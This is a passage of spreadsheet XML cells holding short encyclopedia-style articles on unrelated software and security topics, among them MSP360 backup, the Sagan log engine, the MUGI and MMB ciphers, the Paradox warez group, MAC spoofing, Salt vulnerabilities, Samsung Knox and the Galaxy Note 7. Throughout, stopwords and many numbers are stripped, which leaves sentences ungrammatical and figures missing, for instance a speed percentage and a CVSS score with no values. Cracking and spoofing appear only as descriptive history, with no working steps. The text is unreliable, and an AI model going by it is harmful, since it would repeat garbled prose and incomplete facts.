images computers operating system installed using bootable disk images.msp360 backup software supports synthetic full backup functionality amazon wasabi storage. when performing typical incremental backup sequence, advised perform full backups time time. which time resource consuming. reduce bandwidth amount data uploaded, synthetic full backup feature software scans data, previously backed storage uploads modified blocks instead full files. according msp360 tests, synthetic full backups percent faster typical full image-based backup.msp360 backup perform backups microsoft server microsoft exchange databases recover active, running state. linux, msp360 backup allows users back files folders cloud storage. product supports variety linux distributions, including: ubuntu, debian, suse, hat, fedora, centos, oracle linux amazon linux.msp360 backup configured perform complete backup file directory disk image. also supports incremental backup functionality block level, meaning users able back updated portions files initial backup completed.backups executed manually custom schedules.msp360 backup supports file compression 256-bit encryption. server-side encryption (encryption-at-rest) cloud storage support filename encryption also available. data recovery restoration msp360 backup provides flexible data recovery options. backups restored physical, virtual, cloud virtual machines. product restore files backup, recover selected individual files. product includes recovery wizard guides users data restoration process.msp360 features also include: email notifications alert users status backup recovery operations. granular control backup process file versioning. flexible configuration data retention policies. software editions msp360 backup software available several editions, designed address different cases. windows desktop edition intended file image-based backups, whereas windows server, microsoft exchange, microsoft server, ultimate editions designed meet needs businesses running windows server. there support backup although listed website. macos linux editions address backup needs platforms. service managed service providers (msps) businesses need centrally manage backup customers within environments msp360 also subscription saas offering. hosted console provides means manage monitor large environments single dashboard centralized management monitoring, remote desktop access well storage, billing, capacity reporting.msp360 backup console integrated autotask, connectwise, optitune, microsoft 365, google workspace., pricing msp360 backup, three license types exist: per-computer licensing server, desktop, sql, exchange ultimate licenses installed computer per-host licensing virtual machine edition per-user licensing google workspace microsoft backup reception recognition msp360 backup received several awards, including latest silver stevie award 2018. product constantly ranked market leaders crowd, updates rankings every three months.msp360, developer msp360 backup, gold winner product year category best awards 2018 international.in addition awards, msp360 holds partnerships certifications microsoft, vmware, google cloud, connectwise, oracle, openstack, amazon services. product reviews imore.com gartner peer insights 4.5/5 windows club 3.5/5 pcworld.com 3.5/5 pcmag.com msp360 june 29th, 2021, msp360 announced launch msp360 rmm. cloud-based remote monitoring management solution integrated msp360 backup console allows msps manage infrastructure automation tools. msp360 feature-rich solution embraces features like performance monitoring, windows patch management, software deployment, reporting, alerting, powershell scripting, antivirus management remote access. msp360™ supports windows 8.1, windows server 2012 2019. features msp360 provides wide range features designed streamline management. system resources monitoring allows viewing details hardware controlling usage system’s resources centralized dashboard. windows patch management feature gives ability view available updates install bulk target endpoints. software deployment installs uninstalls applications multiple computers clicks. reporting implies remote monitoring gaining insights automated reports. alerting tracks state systems gets alerts based system performance. licensing each msp360 license comes fully functional free 15-day trial based per-admin approach, unlimited number endpoints administrator. additionally, msp360 connect license integrated msp360 licensing model, allows user connect unlimited number machines remotely additional cost. partners msp360 amazon advanced technology partner. company also established partnerships microsoft azure, google cloud platform, backblaze wasabi, autotask, connectwise, others. also backup list backup software list online backup services file synchronization disk image list disk imaging software references external links official website seth colaner (september 2011). "cloudberry backup desktop review". hothardware. retrieved 2016-09-12. dave mitchell (february 2016). "cloudberry labs enterprise backup". pro. retrieved 2016-09-12. timothy warner (june 2016). "cloudberry backup windows backup cloud". 4sysops. retrieved 2016-09-12. "cloudberry explorer frees from amazon s3's clumsy interface". pcworld. october 2010. retrieved 2016-09-12.</t>
  </si>
  <si>
    <t>MSP360</t>
  </si>
  <si>
    <t>Sagan (software)</t>
  </si>
  <si>
    <t>sagan open source (gnu/gplv2) multi-threaded, high performance, real-time analysis correlation engine developed quadrant information security runs unix operating systems. written uses multi-threaded architecture deliver high performance event analysis. sagan's structure rules work similarly sourcefire snort ids/ips engine. this allows sagan compatible snort suricata rule management softwares give sagan ability correlate snort ids/ips data. sagan supports different output formats reporting analysis, normalization, script execution event detection, geoip detection/alerting time sensitive alerting. also host-based intrusion detection system comparison references sagan user manual sagan resources "centralized structured file analysis open source free software tools" bachelor thesis jens kühnel ipss.ca "course objectives" "securing mikrotik network" andrew thrift (presentation) howto build sagan freebsd sagan "top security tools" "bossie award" infoworld.com. installing sagan oncentos (linux) monitoring. ipss.ca "course objectives" champ clark talks sagan "pauldotcom security weekly" december, 12th, 2013. linux magazine article discusses using sagan monitoring. article written champ clark using kismet, snort sagan build wireless monitoring device. champ clark's guest posting rainer's (author rsysyslog) blog sagan analysis. log, log, everything remotely. using sagan intelligence feeds. what sagan analysis engine is...and what (aug 2016) easing compliance burden sagan technology compliance (feb 2016) junos/screenos vulnerability helps emphasize importance remote storage (dec 2015) using sagan netflow data. reference sagan rule options external links about sagan official sagan wiki sagan flowbits using sagan intelligence feeds sagan output siems.</t>
  </si>
  <si>
    <t>MTR (software)</t>
  </si>
  <si>
    <t>traceroute, originally named matt's traceroute (mtr), computer program combines functions traceroute ping programs network diagnostic tool.mtr probes routers route path limiting number hops individual packets traverse, listening responses expiry. regularly repeat process, usually second, keep track response times hops along path. history original matt's traceroute program written matt kimball 1997. roger wolff took maintaining (renamed traceroute) october 1998. fundamentals licensed terms general public license (gpl) works modern unix-like operating systems. normally works text console, also optional gtk+-based graphical user interface (gui). relies internet control message protocol (icmp) time exceeded (type code packets coming back routers, icmp echo reply packets packets destination host. also user datagram protocol (udp) mode (invoked "-u" command line pressing curses interface) sends packets, time live (ttl) field header increasing probe sent, toward destination host. when mode used, relies icmp port unreachable packets (type code destination reached. also supports ipv6 works similar manner instead relies icmpv6 messages. tool often used network troubleshooting. showing list routers traversed, average round-trip time well packet loss router, allows users identify links given routers responsible certain fractions overall latency packet loss network. this help identify network overuse problems. examples this example shows running linux tracing route host machine (example.lan) server yahoo! (p25.www.re2.yahoo.com) across level communications network. traceroute [v0.71] example.lan 00:07:50 2007 packets pings hostname %loss last best worst example.lan ae-31-51.ebr1.chicago1.level3.n ae-1.ebr2.chicago1.level3.net ae-2.ebr2.washington1.level3.ne ae-1.ebr1.washington1.level3.ne ge-3-0-0-53.gar1.washington1.le 63.210.29.230 t-3-1.bas1.re2.yahoo.com p25.www.re2.yahoo.com additional example shows recent version running freebsd. mpls labels displayed default "-e" switch used command line pressed curses interface): traceroute [v0.82] dax.prolixium.com (0.0.0.0) 12:58:02 2012 keys: help display mode restart statistics order fields quit packets pings host loss% last best wrst stdev voxel.prolixium.net 0.0% 10.4 0.ae2.tsr1.lga5.us.voxel.net 0.0% 10.8 10.8 0.ae59.tsr1.lga3.us.voxel.net 0.0% 16.0 rtr.loss.net.internet2.edu 0.0% 41.8 15.4 64.57.21.210 0.0% 15.7 126.7 35.0 nox1sumgw1-vl-530-nox-mit.nox.org 0.0% 109.5 60.6 23.0 219.5 66.0 [mpls: 172832 nox1sumgw1-peer--207-210-142-234.nox.org 0.0% 25.0 23.2 23.0 25.0 b24-rtr-2-backbone-2.mit.edu 0.0% 23.2 23.4 23.2 24.9 mitnet.trantor.csail.mit.edu 0.0% 23.4 23.4 23.3 23.5 trantor.helicon.csail.mit.edu 0.0% 23.7 25.0 23.5 26.5 zermatt.csail.mit.edu 0.0% 23.1 23.1 23.1 23.3 windows versions winmtr windows application functionally equivalent mtr. originally developed appnor s.r.l.; maintained white-tiger. although similar, winmtr shares common code mtr. console version exist windows, fewer features platforms. also traceroute ping (networking utility) pathping network utility supplied windows beyond combines functions ping traceroute, tracert bufferbloat references external links official website manual page mtr, bitwizard's page unix downloads winmtr, equivalent windows platforms winmtr (redux), fork winmtr, maintained rené schümann white-tiger</t>
  </si>
  <si>
    <t>MUGI</t>
  </si>
  <si>
    <t>cryptography, mugi pseudorandom number generator (prng) designed stream cipher. among cryptographic techniques recommended japanese government cryptrec 2003, however, dropped "candidate" cryptrec revision 2013. mugi takes 128-bit secret 128-bit initial vector (iv). after key- setup process, mugi outputs 64-bit output strings based internal state, updating internal state output block. mugi 1216-bit internal state; three 64-bit registers (the "state") 64-bit registers (the "buffer"). mugi uses non-linear s-box originally defined advanced encryption standard (aes). part linear transformation also reuses matrix aes. basic design influenced panama. security september 2006, known attacks mugi faster serial brute-force space internal state. paper, weakness linear part stream cipher mugi", golic jovan bimal meier willi, abstract claims: "the linearly updated component stream cipher mugi, called buffer, analyzed theoretically using generating function method. particular, proven intrinsic response buffer, without feedback nonlinearly updated component, consists binary linear recurring sequences small linear complexity extremely small period shown weakness principle used facilitate linear cryptanalysis mugi main objectives: reconstruct secret find linear statistical distinguishers." paper, "analysis non-linear part mugi" alex biryukov shamir, abstract claims: "this paper presents results preliminary analysis stream cipher mugi. study nonlinear component cipher identify several potential weaknesses design. while break full mugi design, show extremely sensitive small variations. example, possible recover full 1216-bit state cipher original 128-bit secret using words known stream steps analysis cipher outputs state word different used actual design. linear part eliminated design, secret non-linear 192-bit state recovered given three output words steps. kept design simplified form, scheme broken attack slightly faster exhaustive search." references watanabe, soichi furuya, kazuo takaragi, bart preneel (february 2002). keystream generator mugi (pdf). international workshop fast software encryption (fse 2002). leuven: springer-verlag. 179–194. retrieved 2007-08-07.{{cite conference}}: maint: multiple names: authors list (link) jovan golic (february 2004). weakness linear part stream cipher mugi. 11th international workshop fast software encryption (fse 2004). delhi: springer-verlag. 178–192. alex biryukov; shamir (february 2005). analysis non-linear part mugi. 12th international workshop fast software encryption (fse 2005). paris: springer-verlag. 320–329. archived original (postscript) 2006-05-15. retrieved 2007-08-07. external links mugi homepage</t>
  </si>
  <si>
    <t>MULTI-S01</t>
  </si>
  <si>
    <t>cryptography, multi-s01 (pronounced multi-ess-zero-one), encryption algorithm based pseudorandom number generator (prng). multi-s01 encryption scheme preserving confidentiality data integrity. scheme defines pair algorithms; encryption, corresponding decryption verification. coupling efficient keystream generator, panama, mugi, rc4, algorithm efficiently encrypts message manner single path process, i.e. online algorithm. decryption function cannot used manner keeping whole resultant data successful verification. keysize multi-s01 determined keystream generator use. multi-s01 takes security parameter determines upperbound probability successful forgery. since calculation consists addition multiplication finite field, algorithm suited hardware implementation, although software implementation still feasible. multi-s01 prng panama among cryptographic techniques recommended japanese government cryptrec 2003, however, dropped "candidate" cryptrec revision 2013. also submitted iso/iec 18033 part defines stream-cipher standards. security multi-s01 based underlying prng. secure prng used, security multi-s01 respect confidentiality data integrity proven. data integrity, security proof basically carter–wegman scheme, proven information-theoretically secure. references soichi furuya, kouichi sakurai, ``single-path authenticated-encryption scheme based universal hashing, selected areas cryptography, annual workshop, 2002, john's, newfoundland, canada, aug. 2002, revised papers, nyberg heys, 94–109, lecture notes computer science vol. 2595, springer-verlag, 2002. soichi furuya, watanabe, yoichi seto, kazuo takaragi, ``integrity-aware mode stream cipher, ieice transactions fundamentals electronics, communications computer sciences, vol. e85-a 58–65, 2002. external links multi-s01 home page</t>
  </si>
  <si>
    <t>MMB (cipher)</t>
  </si>
  <si>
    <t>cryptography, (modular multiplication-based block cipher) block cipher designed joan daemen improved replacement idea cipher. modular multiplication central element design. weaknesses schedule identified biham, this, together cipher's designed resist linear cryptanalysis, meant designs pursued instead, 3-way. size block size bits. references wang; nakahara (2009). "cryptanalysis full block cipher". selected areas cryptography 2009. springer-verlag. 231–248. archived original (pdf) 2013-02-03. retrieved 2010-04-24. external links paulo barreto's comments daemen's thesis (the specification appears section 11.5)</t>
  </si>
  <si>
    <t>Paradox (warez)</t>
  </si>
  <si>
    <t>paradox (pdx) warez–demogroup; anonymous group software engineers devise ways defeat software video game licensing protections, process known cracking, illegal jurisdictions. they distribute cracks (software patches), keygens (key generators), pre-cracked versions entire programs. over years, distribution methods changed, starting physically transported floppy disks distribution. today files reach public various peer-to-peer file networks. paradox originally formed late 1989 members danish group trilogy (bad boy, black hawk, tas, pcsu, qrd) french group m.a.d (olivier, stinger, surge, clash, tagada). they began cracking amiga software. original group shut voluntarily 1991 active members joined quartex, later reborn leadership 'maximilien' 1993, ex-quartex members black hawk paragon co-founders. then moved sega genesis snes console scenes. they started cracking software 1994. 2000, cracked playstation game spyro: year dragon, notable stringent anti-piracy measures programmed insomniac games. extensive measures, game's protection initially fully defeated, resulting certain deliberately-programmed "glitches" appear; paradox released fixed, working version ntsc versions months later. 2001, released last cracked game playstation, popular video game final fantasy 2002, team recruited computer black evilgood, alleged qualified crackers time. identity still unknown. they cracked games consoles hand-held devices like playstation, playstation playstation portable, dreamcast, nintendo nintendo gamecube, wii, xbox.paradox noted crack challenging dongle protections many debugging software development programs. team also successfully found method bypassing activation windows vista. this accomplished emulating machine's bios-embedded licensing information installing license. however, windows vista service pack crack longer works correctly; later crack tools exist could remove paradox's cracking method. 2009, paradox first group release slic details working crack windows july 2020, group released date crack monster hunter world: iceborne game protected denuvo anti-tamper, protection widely known hard crack. demoparty awards first place wild compo category euskal 2001 first place amiga category saturne 1994 first place alcatraz pentcost 1990 raids arrests members going alias 'rokman' arrested 1990 using stolen credit card numbers make million long-distance calls paradox members purpose file transfers. nearly quartex members france, including olivier, clash tagada, busted 1991 blue affair. 'maximilien' louarn arrested nintendo copiers affair 1993 held preventive custody three weeks fleeing spain. less year later, 1994, secret service agents caught trip washington vast calling card fraud affair. sentenced years months court. louarn arrested october 2020 taking part creating selling various circumvention devices consoles nintendo switch nintendo 3ds. another members, alias 'tyson', raided 2001 part operation buccaneer. also list warez groups warez scene demoscene standard (warez) references external links official website paradogs.com (down) archived version wayback machine official community sceneboard.paradogs.com (down) archive paradox demos their amiga musicians musics their music</t>
  </si>
  <si>
    <t>MIMEDefang</t>
  </si>
  <si>
    <t>mimedefang licensed framework filtering e-mail. uses sendmail's "milter" api, glue code, perl code user write high-performance mail filters perl.mimedefang used block viruses (e.g. using clamav) block spam (e.g. using spamassassin) remove html mail parts boilerplate disclaimers outgoing mail remove alter attachments replace attachments urls implement sophisticated access controls verify dkim signatures history mimedefang originally developed dianne skoll, contracted royal college physicians surgeons canada 2000 help stop flood email viruses college's network. software written filter attachments originally called mimesweeper, mimedefanger, currently mimedefang. skoll announced software public august 2000. december 2001, version incorporating support spamassassin released, making mimedefang filter spam viruses. skoll's company, roaring penguin software, developed sold commercial anti-spam product known canit, based open-source version mimedefang. roaring penguin software acquired appriver march 2018. march 5th, 2020, appriver agreed give mcgrail foundation leadership open-source mimedefang project period three years, automatically renewable one-year terms unless either appriver mcgrail foundation chooses renew agreement. 28th, 2021, dianne skoll announced fork project, known mailmunge. architecture milter library included sendmail uses posix threads allow multiple concurrent filters. mimedefang's perl filter uses pre-forked process model, similar traditional apache server multi-processing model. mimedefang therefore consists three components: multithreaded program communicates sendmail filtering processes multiplexer (written manages pool perl scanning processes (called "slaves") perl program called mimedefang.pl provides basic filtering infrastructure.mimedefang users code filtering policies perl, using infrastructure provided mimedefang.pl. they need worry thread synchronizations perl filter separate single-threaded process. infrastructure provided mimedefang.pl follows milter reasonably closely, exactly. includes convenience routines parsing rebuilding mime messages filter authors concentrate high-level policy rather worry low-level details. this convenience comes small loss flexibility loss performance. references external links official website</t>
  </si>
  <si>
    <t>Salt (software)</t>
  </si>
  <si>
    <t>salt (sometimes referred saltstack) python-based, open-source software event-driven automation, remote task execution, configuration management. supporting "infrastructure code" approach data center system network deployment management, configuration automation, secops orchestration, vulnerability remediation, hybrid cloud control. history salt originated need high-speed data collection task execution data center systems administrators managing massive infrastructure scale resulting complexity. author salt, thomas hatch, previously created several utilities teams solve problem systems management scale, found open source solutions lacking. hatch decided zeromq messaging library facilitate high-speed requirements built salt using zeromq networking layers. late 2011 initial progress made toward delivery configuration management built salt remote execution engine. this configuration management system stores configuration (state) data inside easily understood data structure leverages yaml. while experimental functionality salt state system available 2011, considered stable release salt 0.9.3 november 2011.the salt 0.14.0 release introduced advanced cloud control system making private public cloud directly manageable salt. salt cloud function allows provisioning hybrid cloud host, exposes salt remote execution, configuration management, event-driven automation capabilities newly provisioned hybrid cloud systems. virtual machines cloud instances automatically connected salt master creation. salt cloud supports public private cloud systems including aws, azure, vmware, cloud, openstack. salt cloud provides interface salt interact cloud hosts cloud’s functionality dns, storage, load balancers, etc. september 2020, vmware acquired saltstack. design salt designed highly modular easily extensible, make easy mold diverse enterprise cases.the module design salt creates python modules handle certain aspects available salt systems. these modules allow interactions within salt detached modified suit needs developer system administrator. salt system maintains many module types manage specific actions. modules added systems support dynamic modules. these modules manage remote execution state management behavior salt. modules separated groups: execution modules workhorse salt's functionality. they represent functions available direct execution remote execution engine. these modules contain specific cross platform information used salt manage portability, constitute core system level functions used salt systems. state modules components make backend salt configuration management system. these modules execute code needed enforce, change configuration target system. like modules, states become available added states modules. grains system detecting static information system storing rapid gathering. renderer modules used render information passed salt state system. renderer system makes possible represent salt's configuration management data serializable format. returners: remote execution calls made salt detached calling system; allows return information generated remote execution returned arbitrary location. management arbitrary return locations managed returner modules. runners master side convenience applications executed salt-run command. vulnerabilities april 2020, f-secure revealed high severity (remote code execution) vulnerabilities, identified cve-2020-11651 cve-2020-11652, cvss score reaching high these critical vulnerabilities found within salt's default communication channel zeromq, initial research discovered 6000 vulnerable salt servers. salt organization notified f-secure's public announcement, salt soon released patch updated releases: 2019.2.4 3000.2. also comparison open-source configuration management software cfengine (software) references external links official website</t>
  </si>
  <si>
    <t>MAC spoofing</t>
  </si>
  <si>
    <t>spoofing technique changing factory-assigned media access control (mac) address network interface networked device. address hard-coded network interface controller (nic) cannot changed. however, many drivers allow address changed. additionally, tools make operating system believe address user's choosing. process masking address known spoofing. essentially, spoofing entails changing computer's identity, reason. motivation changing assigned address allow user bypass access control lists servers routers, either hiding computer network allowing impersonate another network device. however, spoofing work trying bypass parental controls automatic filtering turned spoofing done legitimate illicit purposes alike. hardware existing internet service providers (isp) many isps register client's address service billing services. since addresses unique hard-coded network interface controller (nic) cards, client wants connect device change existing one, detect different addresses might grant internet access devices. this circumvented easily spoofing, client needing spoof device's address appears address registered isp. case, client spoofs address gain internet access multiple devices. while generally legitimate case, spoofing devices considered illegal isp's user agreement prevents user connecting device service. moreover, client person spoof address gain access isp. computer crackers gain unauthorized access technique. this allows gain access unauthorized services, difficult identify track using client's identity. this action considered illegitimate illegal spoofing.this also applies customer-premises equipment, cable modems. leased customer monthly basis, equipment hard-coded address known provider's distribution networks, allowing service established long customer billing arrears. cases provider allows customers provide equipment (and thus avoid monthly leasing bill), provider sometimes requires customer provide address equipment service established. fulfilling software requirements some software installed systems pre-defined addresses stated software end-user license agreement, users comply requirement order gain access software. user install different hardware malfunction original device problem user's card, software recognize hardware. however, problem solved using spoofing. user spoof address appears address software registered. legal issues might arise software multiple devices using spoofing. time, user access software secured license. contacting software vendor might safest route take hardware problem preventing access software. some softwares also perform filtering attempt ensure unauthorized users cannot gain access certain networks would otherwise freely accessible software. such cases considered illegitimate illegal activity legal action taken. identity masking user chooses spoof address order protect privacy, called identity masking. example motivation, wi-fi network connections address encrypted. even secure ieee 802.11i-2004 (wpa) encryption method prevent wi-fi networks sending addresses. hence, order avoid tracked, user might choose spoof device's address. however, computer crackers technique bypass access control methods filtering, without revealing identity. filtering prevents access network address device attempting connect match addresses marked allowed, used networks. computer crackers spoofing gain access networks utilising filtering allowed addresses known them, possibly intent causing damage, appearing legitimate users network. result, real offender undetected enforcement. address randomization wifi prevent third parties using addresses track devices, android, linux, ios, windows implemented address randomization. june 2014, apple announced future versions would randomize addresses wifi connections. linux kernel supported address randomization network scans since march 2015, drivers need updated feature. windows supported since release windows july 2015. controversy although address spoofing illegal, practice caused controversy cases. 2012 indictment aaron swartz, internet hacktivist accused illegally accessing files jstor digital library, prosecutors claimed spoofed address, showed purposeful intent commit criminal acts. june 2014, apple announced future versions platform would randomize addresses wifi connections, making difficult internet service providers track user activities identities, resurrected moral legal arguments surrounding practice spoofing among several blogs newspapers. limitations address spoofing limited local broadcast domain. unlike address spoofing, senders spoof address order cause receiver send response elsewhere, address spoofing response usually received spoofing party filtering turned making spoofer able impersonate device. also address promiscuous mode spoofing ifconfig, linux utility capable changing address references</t>
  </si>
  <si>
    <t>Parallels Workstation Extreme</t>
  </si>
  <si>
    <t>parallels workstation extreme first workstation virtualization product lets users virtualize graphics-intensive software programs geophysical simulation, financial analysis, digital content creation programs commonly used engineers digital animators virtual machines windows linux hosts.to users virtualize resource-intensive programs, parallels partnered intel nvidia incorporated technologies parallels workstation extreme. overview like virtualization software, parallels workstation extreme uses hypervisor grant virtual machines’ direct access host computer's hardware. however, instead handling processes within virtual machine virtualization products render graphics, parallels workstation extreme uses intel virtualization technology directed direct multimedia directly back host's graphics cards nvidia's multi-os allows host machine virtual machine dedicated gpu. each graphic application running virtual machine requires dedicated nvidia quadro 3800, 4800, 5800 graphics card, graphics cards currently supported product.to provide hardware environment support virtualization graphics technologies, hewlett-packard partnered parallels nvidia develop z800, high-end include nvidia's quadro gpus intel's vt-d xeon processor. features parallels workstation extreme includes support cores, guest oss, virtual network adapters virtual machine virtual drive sizes users multiple monitors, display different guest operating system screen also move mouse back forth monitors oss. parallels workstation extreme load balances resources users move different workstation. product also supports cli, pxeboot devices. users utilize virtual machine templates, multiple snapshot capabilities software development kits. also included parallels compressor, designed compress size virtual hard disk, parallels image tool, designed increase decrease size virtual hard disk. system requirements host requirements include: 64-bit windows vista, 64-bit windows 64-bit enterprise linux host operating system intel xeon processors 5500 series disk space virtual machine supported nvidia quadro graphics cardssupported guest operating systems include 64-bit windows vista, 64-bit windows sp3, enterprise linux fedora also platform virtualization graphics card hypervisor virtual machine virtual disk image references external links official webpage</t>
  </si>
  <si>
    <t>MAC times</t>
  </si>
  <si>
    <t>times pieces file system metadata record certain events pertaining computer file occurred recently. events usually described "modification" (the data file modified), "access" (some part file read), "metadata change" (the file's permissions ownership modified), although acronym derived "mtime", "atime", "ctime" structures maintained unix file systems. windows file systems update ctime file's metadata changed, instead using field record time file first created, known "creation time" "birth time". some systems also record birth times files, standard name metadata; zfs, example, stores birth time field called "crtime". times commonly used computer forensics. name mactime originally coined farmer, wrote tool name. modification time (mtime) file's modification time describes content file recently changed. because file systems compare data written file already there, program overwrites part file data previously existed location, modification time updated even though contents technically change. access time (atime) file's access time identifies file recently opened reading. access times usually updated even small portion large file examined. running program maintain file "open" time, time file opened differ time data recently read file. because computer configurations much faster reading data writing updating access times every read operation expensive. some systems mitigate cost storing access times coarser granularity times; rounding access times nearest hour day, file read repeatedly short time frame need access time updated once. windows, addressed waiting hour flush updated access dates disk.some systems also provide options disable access time updating altogether. windows, starting vista, file access time updating disabled default. change time creation time (ctime) unix windows file systems interpret 'ctime' differently: unix systems maintain historical interpretation ctime time certain file metadata, contents, last changed, file's permissions owner (e.g. 'this file's metadata changed 05/05/02 12:15pm'). windows systems ctime mean 'creation time' (also called 'birth time') (e.g. 'this file created 05/05/02 12:15pm').this difference usage lead incorrect presentation time metadata file created windows system accessed unix system vice versa. although specified posix, modern unix file systems (such ext4, hfs+, zfs, ufs2) allow store creation time.ntfs stores creation time change time. semantics creation times source controversy. view creation times refer actual content file: e.g. digital photo creation time would note photo taken first stored computer. different approach creation times stand file system object created, e.g. photo file last restored backup moved disk another. metadata issues file system metadata, user expectations times violated programs metadata-aware. some file-copying utilities explicitly times copy match original file, programs simply create file, read contents original, write data copy, produce files whose times match original. some programs, attempt avoid losing data write operation interrupted, avoid modifying existing files. instead, updated data written file, file moved overwrite original. this practice loses original file metadata unless program explicitly copies metadata original file. windows affected workaround feature called file system tunneling. also computer forensics references external links discussion windows unix timestamps (cygwin project mailing list)</t>
  </si>
  <si>
    <t>Samsung Knox</t>
  </si>
  <si>
    <t>samsung knox proprietary security management framework pre-installed samsung mobile devices. primary purpose provide organizations toolset managing work devices, employee mobile phones interactive kiosks. knox provides granular control standard work profile manage capabilities found samsung devices.knox's features fall within three categories: data security, device manageability, capability. knox also provides web-based services organizations manage devices. organizations customize managed mobile devices configuring various functions, including pre-loaded applications, settings, boot-up animations, home screens, lock screens.as december 2020, organizations specific samsung mobile device cameras barcode scanners, using knox services capture analyze data. overview samsung knox provides hardware software security features allow business personal content coexist device. knox integrates services assist organizations managing fleets mobile devices, allows administrators register devices, identify unified endpoint management (uem) system, define organizational rules govern devices, upgrade device firmware over-the-air. developers integrate features applications using knox sdks rest apis. services samsung knox provides following web-based services organizations: manage mobile devices: knox suite, knox platform enterprise, knox mobile enrollment, knox manage, knox e-fota. customize rebrand devices: knox configure capture analyze data: knox capture, knox peripheral management, knox asset intelligencemost services registered accessed samsung knox consoles, accessed samsung knox sdk. knox capture knox capture uses samsung mobile device’s camera capture major barcode symbologies like upc, code ean, through console, admins manage input, formatting, output configuration scanned barcode data, associate device (for example, internet browser data). knox asset intelligence knox asset intelligence helps organizations improve management, productivity, lifecycle mobile devices. through console, admins monitor device battery management, usage insights, comprehensive device tracking, detailed wi-fi analytics. software container when samsung knox debuted galaxy 2013, included proprietary container feature stored security-sensitive applications data inside protected execution environment. device users could switch personal business applications tapping knox icon lower-left corner device screen. proprietary container, later called knox workspace, managed organizations system.samsung spun consumer versions container feature, require system manage. these consumer versions included personal knox, later called knox starting 2014. knox replaced secure folder 2017.in 2018, samsung partnered google android work profile secure applications data, 2019 deprecated knox workspace container. samsung continues pre-install secure folder flagship mobile devices, consumers must enable use. samsung real-time kernel protection (rkp) samsung feature tracks kernel changes real-time prevents phone booting, well displaying warning message using "unsecured" samsung devices. this feature analogous android dm-verity/avb requires signed bootloader. security enhancements android android) although android phones already protected malicious code exploits android features, samsung knox provides periodic updates check patches protect system. secure boot during secure boot, samsung runs pre-boot environment check signature match operating system (os) elements booting main kernel. unauthorized change detected, e-fuse tripped system's status changes "official" "custom". other features several features facilitate enterprise incorporated samsung knox, including samsung (skms) services, mobile device management (mdm), knox certificate management (cep), single sign-on (sso), time password (otp), management, firmware-over-the-air (fota) virtual private network (vpn).samsung patched kernel prevent root access granted apps even rooting successful since release android oreo. this patch prevents unauthorized apps changing system deters rooting. hardware knox includes built-in hardware security features trustzone technology similar tpm) bootloader rom. knox verified boot monitors protects phone booting process, along knox security built hardware level (introduced knox 3.3). e-fuse samsung knox devices e-fuse indicate whether "untrusted" (non-samsung) boot path ever run. e-fuse device boots non-samsung signed bootloader, kernel, kernel initialization script, data. when set, text "set warranty bit: &lt;reason&gt;" appears. rooting device flashing non-samsung android release also sets e-fuse. once e-fuse set, device longer create knox workspace container access data previously stored existing knox workspace. united states, information used samsung deny warranty service devices modified manner. voiding consumer warranties manner prohibited magnuson–moss warranty 1975, least cases phone's problem directly caused rooting. addition voiding warranty, tripping e-fuse also prevents samsung-specific apps running, secure folder, samsung pay, samsung health, samsung browser's secret mode. older versions knox, possible clear e-fuse flashing custom firmware. samsung options manage samsung added knox allow restrict access using knox platform added control security. samsung knox tima knox's trustzone-based integrity measurement architecture (tima) allows storage keys container certificate signing using trustzone hardware platform. notable security mentions june 2014, defense information systems agency's (disa) list approved products sensitive unclassified included five samsung devices.in october 2014, security researcher discovered samsung knox stores pins plain text rather storing salted hashed pins processing obfuscated code.in october 2014, national security agency (nsa) approved samsung galaxy devices program quickly deploying commercially available technologies. approved products include galaxy galaxy galaxy galaxy galaxy note galaxy note 10.1 2014.in 2016, israeli researchers kanonov avishai wool found three vulnerabilities specific versions knox.in december 2017, knox received "strong" ratings categories gartner publication comparing device security strength various platforms. references external links official website</t>
  </si>
  <si>
    <t>Parallels Server for Mac</t>
  </si>
  <si>
    <t>parallels server server-side desktop virtualization product built server platform developed parallels, inc., developer desktop virtualization virtual private server software. this software allows users multiple distributions linux, windows freebsd server applications alongside server intel-based apple hardware. parallels server development year alpha stage demoed macworld 2008 product officially released june 2008. while beta, parallels server allow running server virtual machine; however, apple eased licensing restrictions parallels server mac's release allow running leopard server virtual machine long virtual machine running apple hardware. overview similar parallels desktop mac, parallels server hypervisor-based server virtualization software allows users multiple guest operating systems, virtual machine, alongside primary "host" operating system. product's hypervisor allows virtual machine function standalone server virtualized hardware, memory processor. however, unlike desktop software, parallels server hardware-optimized enterprise product designed handle server workloads databases enterprise email aimed professional market rather consumer market. parallels server allows users intel-powered apple hardware business environment without isolating servers organization's windows linux systems. system requirements intel-powered server desktop computer running server leopard minimum 40.5 hard disk space parallels server minimum files virtual hard disks optical drive ethernet firewire network adapter features users 64-bit guest operating systems server, windows, linux, apple unix runtime xserve virtual machines apple xserves pros. parallels server comes parallels tools, parallels transporter migration parallels disk image tool modifying size virtual disks. also included parallels management console, allows server administrators manage virtual machines locally remotely parallels explorer, allows access virtual machines without launching guest operating system. additional features include: virtual support 4-way symmetric multi-processing (4-way smp) physical memory support guest memory supports virtual guest disk sizes supports intel virtualization technology (intel vt-x)) hardware acceleration advanced configuration power interface (acpi) support open enables third-party vendors incorporate support parallels server products snmp, command line interface (cli) assistant create virtual machines limitations parallels server intel-based apple hardware must running leopard server, tiger server hardware. also, time, users cannot versions newer 10.6 virtual environment apple licensing restrictions. also 10.7 (lion) 10.8 (mountain lion) 10.9 (mavericks) cannot virtualized software. also virtual private server desktop virtualization virtual machine virtualization references external links official website</t>
  </si>
  <si>
    <t>Samsung Galaxy Note 7</t>
  </si>
  <si>
    <t>samsung galaxy note discontinued android-based phablet designed, developed, produced marketed samsung electronics. unveiled august 2016, officially released august 2016 successor galaxy note samsung's first phone usb-c connector, last phone galaxy note series physical home button. although sixth main device galaxy note series, samsung branded series number instead consumers would perceive inferior flagship samsung galaxy prevent confusion order release release year (2016). galaxy note evolution galaxy note inherited hardware components improvements galaxy including restoration expandable storage ip68 water resistance, features dual-sided curved display, support high-dynamic-range (hdr) color, improvements bundled stylus software features utilize iris recognition system, usb-c port. demand galaxy note upon launch high, breaking pre-order records south korea causing international releases delayed markets supply shortages. galaxy note received positive reviews critics, praised quality construction, support, well streamlined user interface, although criticized high price increasing similarities overall specifications main galaxy series phones. samsung suspended sales galaxy note announced informal recall september 2016 found manufacturing defect phones' batteries caused generate excessive heat, resulting fires. after formal u.s. recall announced september 2016, samsung exchanged affected phones revision utilized batteries sourced different supplier. however, reports emerged incidents replacement phones also caught fire, samsung recalled galaxy note worldwide october 2016, permanently ceased production device later. safety precaution, distributed multi-layer fireproof boxes packing instructions. recalls, samsung issued software updates markets intended 